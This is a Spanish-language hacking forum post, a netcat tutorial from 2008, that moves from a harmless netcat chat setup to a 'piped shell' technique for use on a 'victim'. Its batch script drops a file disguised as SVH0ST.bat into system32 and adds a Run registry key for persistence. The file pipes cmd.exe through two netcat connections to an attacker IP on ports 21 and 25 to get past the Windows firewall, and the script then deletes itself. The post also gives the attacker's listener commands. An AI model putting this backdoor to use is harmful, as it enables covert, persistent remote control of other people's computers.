Inicio Ayuda Buscar Ingresar Registrarse
Noticias: Cuentas de correo ,@hackmexico.net, (Completamente gratis)

Hack México  |  Hacking  |  HacK GeneraL (Moderador: hkm)  |  Tema: manual netcat 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Enviar tema Imprimir
Autor Tema: manual netcat  (Leído 46 veces)
hack_crack
HacK
*
Mensajes: 20


hack_crack


Desconectado  


Ver Perfil

« en: 02 de Julio de 2008, 02:19:20 »
Saludos!!


   Nos embarcamos en un nuevo manual. Esta vez le toca al netcat (nc.exe). El netcat es la navaja suiza de los protocolos TCI/IP. Este manual constará de varios capí­tulos en los que iremos explicando varios usos del netcat, ya que yo considero al netcat una herramienta y no un simple componente para un troyano. Antes de nada debereis de tenerlo, podeis descargaroslo de aqui: http://www.vulnwatch.org/netcat/nc111nt.zip  . Cuando os lo descargueis descomprimidlo y meter el nc.exe en la carpeta system32.



ESTABLECER UN CHAT CON NETCAT


   Es una de la aplicaciones más sencillas de netcat, y sirve para que tomeis lecciones de su sintaxis. Lo primero que debereis de hacer esque vuestro interlocutor del chat tenga tambien el nc.exe en la carpeta system32. Si no es así­ pasadselo y que lo meta allí­.


   Hecho esto deberemos de irnos a cmd.exe (el ms-dos de toda la vida) y pondremos lo siguiete:


Código:
Código:
nc -L -p (PUERTO) -vv
Y nuestro amigo deberá de poner lo siguiente:


Código:
Código:
nc (ip mia) (puerto)
 

   El puerto lógicamente debe de ser el mismo xD, y donde dice ip mia es de la persona que ejecuta la primera lí­nea de comando que os he puesto. Pasemos a analizar detalladamente lo que estamos haciendo.

       En nc -L -p (PUERTO) -vv , vemos  que ponemos -L, ésto significa que estaremos a la escucha del PUERTO incluso si nuestro amigo se desconecta, con esto hacemos que cuando se vuelva a conectar podamos seguir hablando, o bien que otras personas nos hablen. El atributo -p sirve para indicar el puerto, colocamos -p seguido del puerto que queramos utilizar. Después nos encontramos con -vv (very verbose), que recopila toda la información de lo que ocurre en el puerto que indiquemos, en este caso lo que escriba nuestro amigo .


       En esta primera lí­nea de comandos no hemos puesto ninguna IP por que lo que queremos es que se nos conecten a nosotros, por lo que escuchamos nuestro propio puerto. Al no poner ninguna IP, por defecto se nos aplican las acciones a la nuestra.


     En nc (ip mia) (puerto) hacemos que nuestro amigo se conecte a IP mia en mi puerto PUERTO, y así­ entablamos conexión y podemos hablarnos.



--------------------------------------------------------------------------------
  Saludos!!


   Lo siguiente que vamos a ver es un estilo distinto del habitual de tomar una shell.


SHELL PIPELADA

      Antes de empezar con este método de usar shells pipeladas es saber una pequeña cosa de batch, las denominadas tuberí­as o "pipes", que son este signo: | . Estas barritas sirven para redirigir datos entre programas, por decirlo de forma resumida. Si de verdad quereis aprender a usar shells pipeladas teneis que tener eso muy claro, por que si no lo único que hareis será repetir un mecanismo sin saber lo que haceis.


       Supongo que muchos de vosotros habreis intentado pillar alguna shell de forma inversa y tal. Si no matabais el firewall normalmente os bloqueaba el ataque, impidiendo la conexión de la victima a ti. Esto ocurre con el Firewall de Windows XP Service Pack 2. Por ahora estais perdidos seguro xD, pensareis: ¿que me esta contando ahora vengador de las sombras?, habla de pipes y después de firewall, puff, se mata el proceso y ya está.  Si es eso lo que pensais no esta mal pensado, pero existe una forma de hacerlo sin tener que matar ningun proceso, que eso a la larga se agradece y además es más chulo .


     Sigamos viendo cosas de informática en general. ¿Sabeis que puerto es el 21?. Pues para aquellos que no lo sepan es el puerto FTP. El Firewall del SP2 admite la recepción de datos a través de ese puerto.. ¿Interesante?. Aún más es si os digo que el puerto 25 (SMPT) permite la emision de datos...¿Alguien ve la luz al final del túnel?




     Y sin más dilación pasemos al meollo del asunto. Lo primero es que la victima tenga el netcat. Cuando lo tenga deberemos de crear el siguiente bat:
Código:
Código:
@echo off
echo @echo off >> c:\windows\system32\SVH0ST.bat
echo reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SVH0ST" /d "c:\windows\system32\SVH0ST.bat" >> c:\windows\system32\SVH0ST.bat
echo nc ¿“d <IP_ATACANTE> 21 | cmd.exe | nc ¿“d <IP_ATACANTE> 25 >> c:\windows\system32\SVH0ST.bat
del /f /q /s %0
exit

    Cuando nuestra victima vuelva a encender el ordenador, nosotros tendremos que habrir dos ventanas (por cierto cambiar IP atacante por la vuestra). En una de las ventanas podremos esto:

Código:
Código:
nc ¿“vv ¿“L ¿“p 21Y será desde la que daremos las ordenes y en la otra ventana pondremos:
Código:
Código:
nc ¿“vv ¿“L ¿“p 25Y obtendremos los resultados. Al usar los pipes en la victima haremos que se traspase la información de una ventana a la otra por así­ decir, y el Firewall no nos bloqueara.




..::::hack_crack::::..
En línea
Páginas: [1] Enviar tema Imprimir 
Hack México  |  Hacking  |  HacK GeneraL (Moderador: hkm)  |  Tema: manual netcat « anterior próximo »
Ir a:  


Ingresar con nombre de usuario, contraseña y duración de la sesión

Powered by MySQL Powered by PHP
Descargas Directas X-TREMEFOROS.ES 		XHTML 1.0 válido! CSS válido!